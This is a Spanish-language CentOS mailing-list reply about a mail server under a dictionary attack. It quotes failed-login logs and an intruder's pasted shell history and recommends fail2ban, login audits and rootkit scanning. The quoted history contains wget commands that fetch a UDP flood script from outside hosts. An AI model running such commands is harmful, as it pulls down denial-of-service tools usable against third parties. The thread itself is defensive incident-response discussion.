[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Jose Fernández Rodríguez
jfernand2182 en hotmail.com
Vie Mar 22 03:43:10 UTC 2013
Buenas Noches.
Lo que indican los logs son fallos de autenticación que provienen de una dirección remota.
rhost=66.142.38.137
Para resolver esto puede instalar un paquete como fail2ban y configurarlo para que chequee los logs de dovecot y cualquier otro servicio que quieras proteger. Fail2ban verifica 3 intentos fallidos de login desde una misma ip y posteriormente procede a bloquearla por un lapso de tiempo.
En cuanto al historial de comandos que mencionas deberias de verificar si fue una intrusión a tu servidor y que efecto tuvo en el mismo. si no han eliminado los registro del servidor estos comandos pueden ayudarte a saber que usuario logro entrar.
last
lastlog
Puedes indagar más sobre que hace el código que se descargo el intruso y si tuvo algun efecto en tu servidor. generalmente estos se usan para escalar privilegios en el servidor y como rootkit. Existen herramientas como rootkithuter que te permiten detectar software malicioso en el servidor.
Saludos.
> From: luisroman80 en hotmail.com
> To: centos-es en centos.org
> Date: Thu, 21 Mar 2013 15:55:31 +0000
> Subject: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
>
> Buenos días a todos de la lista:
> Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
> ------------------------
>
> dovecot:
>
> Authentication
> Failures:
>
> contacto
> rhost=66.142.38.137 : 88 Time(s)
>
> teste
> rhost=66.142.38.137 : 88 Time(s)
>
> basura
> rhost=66.142.38.137 : 65 Time(s)
>
> renata
> rhost=66.142.38.137 : 65 Time(s)
>
> financeiro
> rhost=66.142.38.137 : 64 Time(s)
>
> biblioteca
> rhost=66.142.38.137 : 62 Time(s)
>
> bodega
> rhost=66.142.38.137 : 62 Time(s)
>
> licita
> rhost=66.142.38.137 : 62 Time(s)
>
> clientes
> rhost=66.142.38.137 : 61 Time(s)
>
> contabilidad
> rhost=66.142.38.137 : 59 Time(s)
>
> estudio
> rhost=66.142.38.137 : 59 Time(s)
>
> mrivera
> rhost=66.142.38.137 : 58 Time(s)
>
> patricio
> rhost=66.142.38.137 : 58 Time(s)
>
> prueba
> rhost=66.142.38.137 : 58 Time(s)
>
> usuario
> rhost=66.142.38.137 : 58 Time(s)
>
> turismo
> rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
>
> check pass;
> user unknown: 3901 Time(s)
> Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto.
> el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit
> El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo.
> Saludos
> Luis Roman
>
>
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org
> http://lists.centos.org/mailman/listinfo/centos-es
Más información sobre la lista de distribución CentOS-es